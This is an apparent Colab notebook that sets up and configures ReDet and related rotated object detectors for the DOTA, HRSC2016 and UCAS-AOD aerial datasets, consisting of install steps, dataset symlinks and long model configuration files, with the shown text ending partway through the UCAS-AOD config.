<a href="https://colab.research.google.com/github/mmoghadam11/ReDet/blob/master/train_UCAS_AOD.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
from google.colab import drive
drive.mount('/content/drive')
# the GPU must be a Tesla T4
# if it is not, go to Runtime > Manage sessions, terminate the session, and start over
!nvidia-smi
```
# Install PyTorch
```
# !pip install torch=1.3.1 torchvision cudatoolkit=10.0
!pip install torch==1.1.0 torchvision==0.3.0
```
# Clone and install the repository
```
# !git clone https://github.com/dingjiansw101/AerialDetection.git
# !git clone https://github.com/csuhan/ReDet.git
!git clone https://github.com/mmoghadam11/ReDet.git
%cd /content/ReDet
! chmod +rx ./compile.sh
!./compile.sh
!python setup.py develop
# !pip install -e .
```
# Install DOTA_devkit
```
! apt-get install swig
%cd /content/ReDet/DOTA_devkit
!swig -c++ -python polyiou.i
!python setup.py build_ext --inplace
```
# Build 1024x1024 image tiles (the final output will be more than 35 GB)
We use the file below to generate the cropped 1024x1024 images:
--srcpath is the location of the original images
--dstpath is the location of the output images
**Note: if the cropped images already exist, there is no need to run the code below**
```
# prepare dota_1024
# %cd /content/ReDet
# %run DOTA_devkit/prepare_dota1.py --srcpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota --dstpath /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new
```
After generating the 1024x1024 images, we **link** them into the project repository
```
# I used symbolic links to manage storage
!mkdir '/content/ReDet/data'
# !mkdir '/content/AerialDetection/data/dota1_1024'
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1_1024 /content/ReDet/data
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota1024new /content/ReDet/data
# !ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/dota_redet /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/HRSC2016 /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS-AOD /content/ReDet/data
!ln -s /content/drive/Shareddrives/mahdiyar_SBU/data/UCAS_AOD659 /content/ReDet/data
# !ln -s /content/drive/MyDrive/++ /content/AerialDetection/data/dota1_1024/test1024
# !ln -s /content/drive/MyDrive/4++/trainval1024 /content/AerialDetection/data/dota1_1024/trainval1024
# !unlink /content/AerialDetection/data/dota1_1024/trainval1024
!ln -s /content/drive/MyDrive/4++/work_dirs /content/ReDet
```
# Check storage
```
# this may fail after about 2 minutes the first time; if it errors, run the same command again (it will not fail the second time)
import os
# print(len(os.listdir(os.path.join('/content/ReDet/data/dota1_1024/test1024/images'))))
print(len(os.listdir(os.path.join('/content/ReDet/data/dota1024new/test1024/images'))))
# the folder size can also be checked (optional)
!du -c /content/ReDet/data/dota1024new
```
# Install mmcv
```
%cd /content/ReDet
!pip install mmcv==0.2.13 #<=0.2.14
# !pip install mmcv==0.4.3
# !pip install mmcv==1.3.9
```
# **configs**
A very important point in the model configs is specifying when checkpoints are saved during training and the location of the dataset.
redet config
```
# %pycat /content/CG-Net/configs/DOTA/faster_rcnn_RoITrans_r101_fpn_baseline.py
%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py
############ the dataset path and name must be updated in this config file; a line of # marks is placed above each line that needs to change
# model settings
model = dict(
type='ReDet',
############################################################################################################
# pretrained='work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-12933bc2.pth',
pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',
############################################################################################################
backbone=dict(
type='ReResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='ReFPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
)
# dataset settings
dataset_type = 'DOTADataset'
########################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
########################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
####################################################################################
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
####################################################################################
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=12)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
####################################################################################
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ReDet_re50_refpn_1x_dota1'
load_from = None
resume_from = None
workflow = [('train', 1)]
############################################################################################
# map: 0.7625466854468368
# classaps: [88.78856374 82.64427543 53.97022743 73.99912889 78.12618094 84.05574561
# 88.03844621 90.88860051 87.78155929 85.75268025 61.76308434 60.39378975
# 75.9600904 68.06737265 63.59028274]
```
**HRSC2016** ReDet
```
%%writefile /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py
# model settings
model = dict(
type='ReDet',
pretrained='/content/ReDet/work_dirs/ReResNet_pretrain/re_resnet50_c8_batch256-25b16846.pth',
backbone=dict(
type='ReResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='ReFPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RiRoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
)
# dataset settings
dataset_type = 'HRSCL1Dataset'
###################################################################################
data_root = '/content/ReDet/data/HRSC2016/'########################################
###################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'Train/HRSC_L1_train.json',
img_prefix=data_root + 'Train/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'Test/HRSC_L1_test.json',
img_prefix=data_root + 'Test/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
ann_file=data_root + 'Test/HRSC_L1_test.json',
img_prefix=data_root + 'Test/images/',
img_scale=(800, 512),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[24, 33])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=1,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 36
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = '/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016'
load_from = None
resume_from = None
workflow = [('train', 1)]
# VOC2007 metrics
# AP50: 90.46 AP75: 89.46 mAP: 70.41
```
faster_rcnn_RoITrans_r50_fpn_1x_dota config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
########## this config is copied from the original repository
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
        score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'DOTADataset'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images/',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
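The `lr_config` entries above use mmdetection's `step` policy with a linear warmup. As a sanity check, here is a small standalone sketch (the function name and structure are illustrative, not the actual mmcv hook) of how that schedule scales the base learning rate:

```python
def scheduled_lr(base_lr, epoch, it,
                 warmup_iters=500, warmup_ratio=1.0 / 3, steps=(8, 11)):
    """Sketch of the 'step' policy with linear warmup.

    For the first `warmup_iters` iterations the lr ramps linearly from
    base_lr * warmup_ratio up to base_lr; afterwards it is decayed by
    10x at each epoch listed in `steps`.
    """
    if it < warmup_iters:
        k = (1 - it / warmup_iters) * (1 - warmup_ratio)
        return base_lr * (1 - k)
    gamma = 0.1 ** sum(1 for s in steps if epoch >= s)
    return base_lr * gamma

print(scheduled_lr(0.01, epoch=3, it=1000))    # full base lr after warmup
print(scheduled_lr(0.01, epoch=9, it=50000))   # decayed 10x after epoch 8
```

With `step=[24, 33]` and `total_epochs = 36`, the same logic gives the two 10x decays of the 3x HRSC2016 schedule.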
faster_rcnn_obb_r50_fpn_1x_dota config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py
########## This config was copied from the original repository
# model settings
model = dict(
type='FasterRCNNOBB',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=16,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=False,
with_module=False,
hbb_trans='hbbpolyobb',
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
        score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'DOTADataset'
#################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/dota1024new/'
#################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images/',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',
img_prefix=data_root + 'trainval1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test1024/DOTA_test1024.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test1024/images',
# img_prefix=data_root + 'val1024/images',
img_scale=(1024, 1024),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=1,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_obb_r50_fpn_1x_dota'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
# UCAS_AOD config
```
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py
########## This config was copied from the original repository
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
##############################################
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
###################################################
num_classes=2,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
